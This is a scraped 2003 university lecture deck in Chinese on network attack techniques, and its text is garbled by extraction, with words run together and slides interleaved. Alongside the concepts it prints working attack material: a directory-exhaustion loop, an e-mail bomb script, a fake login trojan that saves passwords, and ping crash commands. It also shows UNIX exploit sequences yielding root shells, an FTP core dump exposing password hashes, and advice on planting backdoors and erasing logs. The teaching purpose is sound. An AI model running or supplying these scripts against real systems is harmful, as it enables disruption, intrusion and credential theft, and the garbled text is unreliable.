- 2022-08-13 发布 |
- 37.5 KB |
- 13页
申明敬告: 本站不保证该用户上传的文档完整性,不预览、不比对内容而直接下载产生的反悔问题本站不予受理。
文档介绍
计算机安全学讲义_第五讲:网络安全
研究生课程第五讲:计算机网络安全网络安全之一:攻击技术计算机安全学ü网络安全攻击概念ü常见的攻击手段CryptographyandComputerµ破坏性攻击Securityµ扫描攻击µ口令攻击µ特洛伊木马陈克非µ嗅探器kfchen@mail.sjtu.edu.cnµ电子欺骗攻击ftp://ftp.cs.sjtu.edu.cn/chen-kf/µ程序漏洞攻击2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室12003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室2网络安全技术的目标物理安全的措施ü计算机网络安全:是指通过采取各种技术的和管ü早期的安全技术,主要以物理保护加上安全管理理的措施,确保网络数据的可用性、完整性和保的方式密性,其目的是确保经过网络传输和交换的数据ü加强对建筑物、机房等等保护、报警措施,防范不会发生增加、修改、丢失和泄漏等。外部人员的侵入和破坏、防电磁辐射等ü随着计算机网络技术的发展,网络的安全和可靠ü物理攻击主要可能是偷窃、破坏计算机设备、外成为不同使用层次的用户共同关心的问题。人们围设备、存储设备、软硬(盘)件等都在希望自己的网络能够更加可靠地运行,不受ü内部人员被限制在很小一部分人中(如系统管理外来入侵者的干扰和破坏。解决好网络的安全和员等)可靠性,是保证网络正常运行的前提和保障。2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室32003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室4网络安全的面临挑战系统复杂带来的安全问题ü开放的、分布式协同计算环境中,原有的安全措施很难奏效(特别是以后的ComputingGrid环境,ü系统和网络的复杂性问题更多)µInternet跨越无数组织和国家,网络互µ结构松散,异地分散,无法有效管理连设备和通信介质多种多样µ用户透明,资源共享,面临多种攻击µ连接在Internet上的计算机和操作系统ü网络系统规模日益庞大,必然导致系统安全性、可靠性降低种类繁多µ设计缺陷,给安全带来影响无法消除,如操作系统的µ很难从根本上解决全部安全问题管理员权限,TCP/IP协议等µ软件的可靠性有限,存在缺陷和后门,给攻击者机会2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室52003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室61\n系统设计带来的安全问题系统实现带来的安全问题ü系统设计中的缺陷ü系统实现中的缺陷µ操作系统、网络协议和应用系统的设µ即使在系统设计中考虑周全,也可能出现对设计的理解上不一致,使得实现的系统计中都或多或少的存在缺陷并不是设计时所想象的系统,在实现细节µ早期的系统设计中对安全问题考虑较上考虑不周少、缺乏足够的安全知识和经验、没µ系统实现中的缺陷还往往出现在程序的错有形成严密的安全体系,随着网络的误上,由于时间所限,加之测试工具限制不断庞大,很难从根本上完全消除这,许多系统未经充分测试就投入运行些缺陷2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室72003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室8系统管理带来的安全问题相关的安全概念ü安全攻击:某个机构或个人如何危及信息ü系统管理中的缺陷安全的行为µ即使在系统设计和系统实现过程中都较好地避免缺陷存在,但是系统管理员和安全员是否正ü安全机制:被设计用来检测、防范安全攻确地安装、配置了系统?击,或从安全攻击中恢复的机制µ是否做好有效的安全隔离?ü安全服务:增强数据处理系统和信息传输µ是否清楚信任主机的安全状况?安全的服务µ是否定期检查重要系统文件?µ其它2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室92003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室10针对保密性的攻击针对完整性的攻击üUnauthorizedaccesstoinformationüStoptheflowofthemessageüPacketsniffersandwiretappersüDelayandoptionallymodifythemessageüIllicitcopyingoffilesandprogramsüReleasethemessageagain2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室112003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室122\n针对真实性的攻击针对可用性的攻击üDestroyhardware(cuttingfiber)orsoftwareüUnauthorizedassumptionofother’sidentityüModifysoftwareinasubtleway(aliascommands)üGenerateanddistributeobjectsunderthisüCorruptpacketsintransitidentityüDenialofservice(DoS):Crashingtheserver;Overwhelmtheserver(useupitsresource)2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室132003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室14攻击的效果攻击手段的结合üTheftofconfidentialinformationüUnauthorizeduseofµNetworkbandwidthµComputingresourceüSpreadoffalseinformationüDisruptionoflegitimateservices2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室152003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室16著名的例子:蠕虫病毒蠕虫扩散的经过üInternet蠕虫ü1988年11月2日下午5点,Worm进入Cornell大学的计算机中,几小时之内,就传播到Berkeley,µRobertT.Morris编写的一组C语言程序,它能Harvard,MIT,Princeton,Purdue,Standford等通过网络传输和繁殖,导致计算机速度减慢并大学以及NASA研究中心等几百个其它研究中心停机ü1988年11月2日晚上10点,LawrenceLivermore国µ1988年10月25日,Morris使用Guesses程序在家实验室800台计算机的网络感染Worm。MorrisCornell和Standford上搜索到336个口令试图通过Internet发出一个告警信息,但大学的计µ1988年10月29日,Morris已经发现435个可以算机系统已经瘫痪。几小时之内,全国范围内的用来进入网络的口令6000多台机器受到了感染2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室172003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室183\n蠕虫病毒的影响蠕虫的传播途经ü1988年11月8日,FBI发起了一个大规模关于üInternet蠕虫的构成RobertMorris的犯罪调查。µ99行的引导程序;ü1990年5月4日,Morris被判3年缓刑,$10000罚金µ约3000行C语言源代码的蠕虫程序和400小时的社会服务。üInternet蠕虫是怎样传播的?üInternet蠕虫造成的损失µ高达$9500,0000µ侵入系统,植入引导程序µ另一种估算为$468,0000µ编译引导程序,连接原机器下载蠕虫程序,并ü影响巨大、深远执行µCERT,计算机应急反应队伍2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室192003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室20蠕虫的技术攻击特点常见黑客攻击技术ü漏洞:通过精心设计的邮件给sendmail系统,可ü破坏性攻击以强制sendmail以超级用户的权限执行命令;可以确定远程主机操作系统信息、以及可运行对程ü扫描攻击序。ü口令攻击ü缓冲溢出:利用fingerd可以看到系统中的敏感信息;由于系统调用get()时不检查参数的长度,用ü特洛伊木马户控制下出现缓冲区溢出;如果熟悉操作系统,ü嗅探器可以在遇到缓冲区溢出时转而执行另一程序(如Shell,成为root用户)ü电子欺骗攻击ü词典:rsh/rexecü程序漏洞攻击2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室212003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室22破坏性攻击UNIX破坏程序üUNIX破坏程序ü进程过载ü拒绝服务(DenialofService)ü过量申请内存、占用对换空间üE-mail炸弹ü大量使用系统命令,CPU占用ü病毒ü/tmp目录占用ü文件系统破坏2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室232003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室244\n文件系统破坏拒绝服务(DenialofService)#!/bin/kshü什么是拒绝服务?#µ拒绝服务攻击是指通过消耗大量的系统资源,或利用系统的某些漏洞使目标节点反复执行无#意义的操作甚至瘫痪,从而无法继续提供服务。whilemkdirabcü如何进行拒绝服务攻击?doµ消耗系统资源cdabcµ破坏系统,使之瘫痪done2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室252003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室26Ping命令的问题拒绝服务攻击的例子1üTCP/IP协议中规定了数据包的最大长度,有的系$ping-v-s1024127.0.0.1统在收到过长的IP包时,会有系统崩溃、重新启该命令将引起早期的某些UNIX系统崩溃,因动和死机等反应为不能处理超长ICMP报文。üICMP是TCP/IP的子集,用于系统间传递错误信息和控制信息。一般系统上,命令ping在缺省时发$ping-sv-i127.0.0.1224.0.0.1送的数据报文仅包含8个字节的ICMP头信息,但该命令将引起Solaris系统崩溃。用户可以任意指定该ICMP数据报文的长度。2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室272003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室28Tcp_syn_flooding问题拒绝服务攻击的例子2ü当客户端试图与服务器建立一个TCP连接时,服ü通过向目标机器发送大量的“半打开”TCP连接请务器和客户端将交换一系列消息求,使目标机器核心处理队列超过极限,从而不µ客户端向服务器端发起SYN消息;能处理其它的远程请求。µ服务器向客户端以SYN-ACK消息来响应;µ客户端通过回应一个ACK消息来完成连接的建立ClientABServerü潜在的危险是:服务器向客户发送SYN-ACK而客SYN户端还没有收到的时候(半打开连接状态)µ服务器已经在系统内存中描述所有带来的连接的数据SYN-ACK库结构,该数据结构的大小是有限的不回应ACKµ攻击者通过创建过多的“半打开”连接来产生溢出2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室292003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室305\nE-mail炸弹E-mail炸弹的例子#!/usr/bin/kshü什么是E-mail炸弹?##Mail-bombscriptµE-mail炸弹就是向用户发送大量的电子typeset-ino_msgscount=0邮件,填满用户的邮箱reademail?"Whomdoyouwanttobomb?”readsubject?"Enterthesubjectofthemailmessage”üE-mail炸弹攻击readbomb_msg?"Enterthenameofthefilewiththebombmessage”µE-mail程序包readno_msgs?"Howmanytimesdoyouwanttosendthismessage?”µ列表连接while[[count-ltno_msgs]]doelm<$bomb_msg-s"$subject"$emailcount=count+1done2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室312003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室32病毒病毒的特点ü什么是病毒?ü病毒是自我复制的。病毒的自我复制是通µ病毒就是一种能使自己附加到目标系统的文件过把自己附着于某一类文件之中来进行的。上的程序。是人们非常熟悉的一种破坏计算机ü编制病毒也变得越来越简单!系统正常工作的技术。µ有许多可以使用的病毒制造工具ü如何使用病毒进行攻击?VVirusCreationLaboratoriesVVirusFactoryµ网络攻击中的病毒主要要解决初始入侵、传播VVirusCreation2000及引发技术。VVirusConstructionSetVTheWindowsVirusEngine2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室332003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室34有关病毒的例子有关病毒的例子ü病毒名称:W32/Gibe@MMü1999年3月26日,邮件病毒“Melissa”在美国被发 发现日期:2002-03-05现,并通过Internet迅速蔓延,截止3月31日,北 最早出现地区:未知美有超过5万个、德国2000多个、日本1500多个企 病毒长度:122880字节业遭到该病毒的感染 病毒类型:邮件病毒ü该病毒一方面使用户文档泄密,另一方面又自动制造大量电子邮件ü病毒特征:该病毒伪装成微软的安全补丁Q216309.EXE,旨在诱使用户执行。它会同时利用微软的Outlook以及受害用户的默认SMTP服务器来向外发送带毒邮件。然而,在测试时该病毒还存在许多Bug,并不能成功地利用Outlook来传播。2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室352003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室366\n扫描攻击(scanner)如何利用扫描器攻击?ü扫描器ü扫描器是为提高网络安全性而设计的,它们能发µ扫描器是自动检测远程或本地主机安全性弱点的程序现网络的漏洞,进而可以帮助系统管理员提高系µ通过使用扫描器,用户可以不留痕迹地发现远程主机的安全性弱点统的安全性。ü扫描器工作原理ü同样,利用扫描器发现的系统漏洞,可以更快地µ扫描器通过选通所有已知的TCP/IP端口和服务,测试目标节点,并记录目标的回答。通过这发现攻击目标和突破口,进而对网络进行攻。种方法,搜集关于目标主机的有用信息(如开放什么服务?匿名用户是否可以登录等等)2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室372003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室38一些扫描程序口令攻击üSATAN(SecurityAdministratorToolforAnalyzingü口令攻击的概念Network)µ通过对加密的口令进行解密,获取口令明文µ是一个分析网络的安全管理工具和测试、报告工具,可用来收集网络上主机的许多信息。ü口令攻击原理üISS(InternetSecurityScanner)µ对加密算法进行解密;有限穷举方法µ商用扫描工具,功能强大,可以检测出主机的弱点ü口令攻击的重要性üStrobeµ口令攻击通常是其它攻击方法的基础,获得口令就获µTCP端口扫描器,可以在最大带宽和最小进程资源下,迅速得了该用户的全部权限定位和描述(多台)目标远程的TCP监听端口ü口令攻击程序üNSS(NetworkSecurityScanner)µCrack;CrackerJack;PaceCrack95;NTCrack;L0phtCrackµ最大特点是速度快。类似其它扫描器,但由perl语言编写(在CGI编程方面有广泛应用)2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室392003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室40Crack程序特洛伊木马(TrojanHorse)ü口令不会被解开,多数口令加密过程都是单向、ü什么是特洛伊木马?不可逆的。µ一个传说:古希腊人打败特洛伊人靠的是把一只巨型的木马送入特洛伊城,而木马内藏有武士。ü但是可以使用仿真工具,利用与原口令程序相同µ包含在合法程序里的非授权代码的方法,通过对比分析,用不同的加密口令去取µ特洛伊木马是做一些超出用户所希望、并且有害的事匹配原口令。情的程序。µUNIX8字符口令攻击µ执行隐藏的或不需要功能的程序µ口令攻击词典ü特洛伊木马的危害?µ特定模式的强力计算µ隐蔽性强µ对系统破坏程度无法预料2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室412003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室427\n特洛伊程序的特点特洛伊木马程序ü特洛伊程序是由编程人员创造的。它的作者都有#!/bin/sh着自己的意图,这种意图可以是任意的。echo“login:”ü一个特洛伊程序将要做的是下列两件事中的一件readlogin_name(或两者兼有):echo“Password:”stty-echoµ提供一些功能,这些功能可以泄露一些系统的私有信息给程序的作者或者控制该系统。readpassword_nameµ隐藏了一些功能,这些功能能够将系统的私有信息泄echo$login_name$password_name>>/tmp/aaa露给程序的作者,或者能够控制该系统。sttyechologin2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室432003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室44特洛伊木马的例子怎样防范特洛伊程序?üAOLGOLD程序üMD5MD5是一个可以为每个文件生成一个数字签µ自称AOL软件包,含压缩文件archved;解压得两文件,其一为install.bat;执行后展开18个文件:将名的工具。VIDEO.DRV改名为VIRUS.BAT,并运行üTripWireTripWire是一种unix上广泛应用的系统µVIDEO.DRV删除C驱动器上所有关键路径上的文件完整性工具。üSATAN1.0ü从什么地方可以找到特洛伊程序?µ在/etc/passwd文件中设置一个特殊入口,用户名为suserµ从技术上讲,特洛伊程序可能存在于任何操作系统和üWUftpd2.2平台上。但是,特洛伊程序的散播与病毒的传播是极为相似的:从Internet上下载的软件,特别是免费软件µ使普通用户成为root。或共享软件,都是十分可疑的。类似的,从匿名服务üQuota器或Usenet新闻组中获得的程序,也是十分可疑的。µQuota版本拷贝口令和NIS映射表并通过e-mail发送出去2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室452003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室46嗅探器(Sniffer)嗅探器的危胁ü嗅探器能够造成的危害ü什么是嗅探器?µ嗅探器能够捕获口令µ嗅探器(Sniffer)是能够捕获网络报文的程序µ嗅探器能够捕获专用或机密信息或设备µ嗅探器可以用来分析协议µ既可以是硬件,也可以是软件µ嗅探器可以用来攻击网络µ最早由NetworkGeneral公司开发。ü根据CERT所列的各种攻击方法的命中率清单,“Snifferattack”列在第一位,是所有攻击技术中ü嗅探器工作方式成功率最高的技术µSniffer利用网络工作原理,截取网络上传输的报文,分ü1993年,在Internet网关计算机系统中,发现了嗅析采用的协议,过滤出有用信息。探器,据最初估计,大约探测到10万多条口令2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室472003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室488\n嗅探器造成的危害嗅探器工具ü1994年12月,美国海军学院计算机系统为不明ü嗅探器的位置Hacker攻击,攻击者分别从英国、芬兰、加拿大µ网关节点、美国发动进攻,袭击了24个服务器并在其中植µ本地网段入8个嗅探器,造成一个主要的路由器被破坏,一ü常见嗅探器些系统文件被删除,两个加密文件被复制,12000µLANWatch多个口令被篡改µNetXRayü海军系统无法对此次攻击作出损失估计,没有抓µEsniff获攻击者µNetman2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室492003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室50嗅探器的使用电子欺骗攻击(spoofing)InternetInternetDDNDDN,,X.25X.25ü什么是电子欺骗(spoofing)?嗅探器µ电子欺骗(spoofing)就是通过伪造一个可信任地址的节点路由器数据包使一台机器认可另一台机器的技术TCP/IPTCP/IPü电子欺骗的前提µInternet认证方法拨号设备µIP地址µ可信主机PSTNPSTN2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室512003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室52典型的攻击过程IPspoofing攻击ü让一台机器扮演另一台机器ClientABServerü典型的攻击过程µ让被替代的机器A休眠SYN,SEQ=x,无ACKµ发现目标机器B的序列号规律µ冒充机器A向机器B发出请求,算出机器应该SYN,SEQ=y,ACK=x+1发来什么序列号,给出机器B想要的回应。µ这样就可以利用机器B对机器A的信任关系进行攻击。SEQ=X,ACK=y+12003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室532003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室549\nIPspoofing攻击防范IP欺骗120.18.1.1120.18.1.1üIP电子欺骗并不容易:A’计算机µ此技术只适用于少数平台A计算机µ这项技术复杂难懂,甚至对接密高手也是如此。µ用户可以很容易防范IP欺骗攻击路ü怎样防止IP欺骗的攻击120.18.1.2由器µ在路由器上通过配置你的网络系统参数,拒绝InternetB计算机网络中声明来自本地的数据包。2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室552003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室56其它形式的IP欺骗程序漏洞攻击üARP欺骗ü关于漏洞µARP欺骗通过更改ARP缓冲来实施欺骗µ漏洞的概念:漏洞就是硬件、软件或管理配置µARP欺骗通常只在本地网段有效上的缺陷üDNS欺骗µ漏洞的出现:黑客、安全组织、专业公司µDNS欺骗通过更改DNS服务器的主机名和IP地址映射µ漏洞的时间性:及时打补丁,及时更新表来实现攻击2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室572003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室58缓冲溢出(bufferoverflow)例子:DigitalUNIX_1$ln-s/.rhostscoreü什么是缓冲溢出?$IMP=’>++µ缓冲溢出(bufferoverflow)攻击是通过往程>’序的缓冲区写入超出其长度的内容,造成缓冲$pingalpha1&区的溢出,从而破坏程序的堆栈,使程序转而[1]1337$pingalpha1&执行其它指令或命令的方法[2]31337ü为什么会有缓冲溢出?$kill-1131337$kill-111337µ程序设计不严格[1]Segmentationfault/usr/sbin/pingalpha1(coredumped)µ库函数(字符串操作等)[2]Segmentationfault/usr/sbin/pingalpha1(coredumped)$ls-l/.rhostsü利用缓冲溢出进行攻击-rw-------1rootsystem385024Mar2905:17/.rhosts$rloginlocalhost-lroot#2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室592003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室6010\n例子:DigitalUNIX_2例子:DigitalUNIX_3$ln-s/.rhostscore$cc-cfile.cld-shared-no_archive-ofile.so-set_versionBOB42=”osf.1file.o-lc++”$telnet>envdef_RLD_LIST/tmp/file.so:DEFAULT$exportBOB42$telnet>envexp_RLD_LIST$dbx/bin/crontab$telnet>olocalhost$rsh-lrootlocalhost/bin/sh-i#2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室612003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室62例子:SunOS4.1.4例子:SunOS$cat/dev/tcx0cat/dev/zero>/dev/keyboard$ls/dev/tcx0/*使系统自陷2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室632003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室64例子:SunOS4.1.3例子:SunFTPmain(argc,argv)ftp>cd/tmpintargc;250CWDcommandsuccessful.char*argv[];ftp>userrootDUMP_CORE_FTPD{331Passwordrequiredforroot.intfd;530Loginincorrect.Loginfailed.fd=creat(argc<2?"/dev/fb":argv[1],0755);ftp>quotepasvif(fd<0)perror("creat"),exit(1);421Servicenotavailable,remoteserverhasclosedconnectionfchmod(fd,0755);ftp>quit$ls-lacore-rw-r-----1rootnetwork264656Nov1211:14core}2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室652003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室6611\n例子:SunFTP例子:IntelPentium$stringscore|morenoaccess:*LK*:6445::::::charx[5]={0xf0,0x0f,0xc7,0xc8};sp00n:o.IZGdC5eBTtKY:10175:7:28::::main(){root:aiqzotPNtTsI:9988::::::void(*f)()=x;user2:U6d5srjcJi/KU:9952::::::f();joeuser:ktxVoVPQVIgc.:10175:7:28::::root::0:root}other::1:bin::2:root,daemon或在Debug下:sys::3:root,bin,adme0100f00fc7c8adm::4:root,daemonguucp::5:root2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室672003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室68远程攻击远程攻击的策略ü什么是远程攻击?ü远程攻击采用适当技术µ远程攻击是从远程对目标机器发动攻击ü获得攻击目标IP地址ü远程攻击步骤µ明确攻击目标ü明确目的µ收集目标节点信息µ要获取什么样的信息?µ分析目标节点及周边节点安全保护强度µ破坏µ研究攻击方法并进行模拟攻击实验µ窃取特权µ建立攻击掩护节点及用户,进行实际攻击µ消除痕迹2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室692003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室70远程攻击的手段远程攻击的准备ü分析目标节点及周边节点安全保护强度ü收集目标节点信息µ安全建议文档ü收集目标节点是什么类型的计算机系统µCERTµ运行何种操作系统,是什么版本?µHacker站点µ隶属于什么网络?µ自身掌握的技术µhost或nslookup,获取网络概况ü研究攻击方法并进行模拟攻击实验µWHOIS,获取域名、主机名,µ进一步收集并分析目标节点系统提供什么类型的服务?是否存在已知的漏洞?µfinger和rusersµ采取的是什么样的安全防护措施?µtelnet和ftpµ运用已掌握的攻击技术或研究有针对性的攻击技术进行模拟攻击,形成具体攻击方案。2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室712003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室7212\n实施远程攻击的步骤第六讲预告ü建立攻击掩护节点及用户,进行实际攻击µ在目标节点相邻网络或公开网络中寻找掩护节点及用户,从这些掩护节点开始实施实际攻击µ若攻击成功,在关键系统文件中植入“特洛伊木马”,网络安全之二:设置“后门”ü消除痕迹µ攻击结束,修改系统中记帐、日志文件,消除痕迹。弱点扫描和入侵检测ü远程攻击采用的技术µ上述技术的综合运用。2003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室732003-3-24©上海交通大学计算机系,上海交通大学密码与信息安全实验室7413查看更多